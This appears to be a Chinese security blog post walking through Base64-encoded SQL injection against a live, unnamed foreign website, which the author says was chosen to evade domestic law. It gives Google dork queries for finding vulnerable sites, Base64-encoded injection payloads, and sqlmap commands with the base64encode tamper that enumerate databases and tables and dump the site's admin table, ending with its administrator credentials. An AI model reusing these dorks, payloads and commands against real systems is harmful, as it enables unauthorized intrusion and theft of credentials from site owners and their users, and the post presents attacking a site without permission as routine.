您的位置 首页 网络安全

BASE64变形注入(实战漏洞复现)

注入简介: 什么是base64注入? base64注入是针对传递的参数被base64加密后的注入点进行注入。除…

注入简介:


什么是base64注入?

base64注入是针对传递的参数被base64加密后的注入点进行注入。除了数据被加密以外,其中注入方式与常规注入没有什么区别.

编码方式工具选择:

如何发现此类型漏洞?

  • 第一种,例如id=1,把id=1全部加密处理,得到aWQ9MQ==,直接用谷歌hacking搜索inurl:?aWQ0

  • 第二种,只处理传参值,得到id=MQ==,搜索inurl:?id=M*=

注入实现


目标选择:由于国内法律比较严,再次采用某国外站点做测试(!!!!)

漏洞复现:

挂上代理利用谷歌语法搜索:inurl: “id=MQ==”

此次目标为:http://XXXXXX.com/product.php?id=MQ==

打开界面如下显示

利用加解密工具进行编码测试.

payload如下:

  • MScgYW5kIDE9MSM=(1′ and 1=1#)页面正常显示
  • MScgYW5kIDE9MiM=(1′ and 1=2#)页面报错,存在注入点
  • MScgb3JkZXIgYnkgMSM=(1′ order by 1#)排序测试列正常
  • MScgb3JkZXIgYnkgMiM=(1′ order by 2#)Unknown column ‘2

从此图判断出此网站应用存在注入点,只不过传过去的参数进行了base64解码.

直接上工具,利用sqlmap里面tamper自带的base64encode一把梭.

按照正常的顺序,爆数据库,爆表,爆内容

数据库:sqlmap.py -u “http://XXXXXX.com/product.php?id=” –tamper=base64encode –dbs

fa8e265b5b1a49b70d785d55e8207573

表:sqlmap.py -u “http://XXXXXX.com/product.php?id=” –tamper=base64encode –tables -D “cdilba5b_rk”

bf865b310430c92e03baa4c26d016766

最后是内容:sqlmap.py -u “http://XXXXXX.com/product.php?id=” –tamper=base64encode –dump -D “cdilba5b_rk” -T “admin”

056a5b0f1c7f6d582518f6a57cf398c2

至此,已经拿到该网站的数据库用户以及密码.由于此篇文章只用展示漏洞复现,后面不在进行深入.

后续有无线渗透以及内网案例,更多精彩,敬请关注F12Sec!!!
本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/969/
头像

作者: Elioit

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...
联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部